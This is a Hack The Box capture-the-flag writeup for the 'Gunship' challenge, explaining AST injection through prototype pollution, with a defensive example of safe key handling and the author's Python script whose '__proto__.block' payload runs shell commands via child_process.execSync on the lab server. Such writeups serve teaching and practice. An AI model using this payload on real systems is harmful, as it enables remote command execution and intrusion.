[ Hack The Box ] Gunship - Writeup

Ghi
2 min read · Mar 12, 2022

“A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶”

Start with a website that takes user input:

After examining the source code, we found that it is vulnerable to AST injection. You should read more from here.
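AST injection depends on prototype pollution, so it helps to see why a JSON key shaped like `__proto__.block` is dangerous. The block below is an added example, not the challenge's source code: `unflattenNaive`, `unflattenSafe` and `demo` are hypothetical helpers, and it assumes the server expands dotted keys into nested objects. It shows the weak expansion beside a hardened one, using a constructed body with an inert value.

```javascript
// Added example: hypothetical helpers, not the challenge's source code.
// Assumption: the server expands dotted keys ("a.b": v -> {a: {b: v}}).

// Weak version: walks the path with no key checks.
function unflattenNaive(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    let node = out;
    for (const part of parts.slice(0, -1)) {
      if (typeof node[part] !== 'object' || node[part] === null) node[part] = {};
      node = node[part]; // for "__proto__" this is Object.prototype
    }
    node[parts[parts.length - 1]] = value;
  }
  return out;
}

// Hardened version: rejects prototype-related segments, uses null-prototype objects.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function unflattenSafe(flat) {
  const out = Object.create(null);
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    if (parts.some((p) => FORBIDDEN.has(p))) throw new TypeError(`rejected key: ${path}`);
    let node = out;
    for (const part of parts.slice(0, -1)) {
      if (typeof node[part] !== 'object' || node[part] === null) node[part] = Object.create(null);
      node = node[part];
    }
    node[parts[parts.length - 1]] = value;
  }
  return out;
}

// Constructed body with the same key shape as the request in this writeup; "MARKER" is inert.
function demo() {
  const body = JSON.parse('{"artist.name":"Haigh","__proto__.block":{"type":"Text","line":"MARKER"}}');
  unflattenNaive(body);
  const polluted = ({}).block !== undefined; // unrelated objects now inherit "block"
  delete Object.prototype.block;             // undo the pollution before the next check
  let rejected = false;
  try { unflattenSafe(body); } catch (e) { rejected = e instanceof TypeError; }
  return { polluted, rejected, cleanAfter: ({}).block === undefined };
}

console.log(demo());
```

Once `Object.prototype.block` exists, any code that reads an optional `block` property from its own objects (a template compiler walking AST nodes, for example) picks up the injected value, which is why rejecting these keys at the input boundary closes the issue.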

Following the article, I wrote a little Python script to get the flag:

import requests

TARGET_URL = 'http://167.172.56.232:30317'  # change_me

a = requests.post(TARGET_URL + '/api/submit', json={
    "artist.name": "Haigh",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync('$(ls)')"  # change_me
    }
})
print(a.text)

At line 9, we run the ls command first to get the flag file name, then edit the script to use the cat command with the file name we found to get the flag. The $(command) construct takes the output of the command and then tries to run that output as a command, so we get the output we want back as an error. If we don’t use that, we won’t get anything back, like this:

Here is the flag:
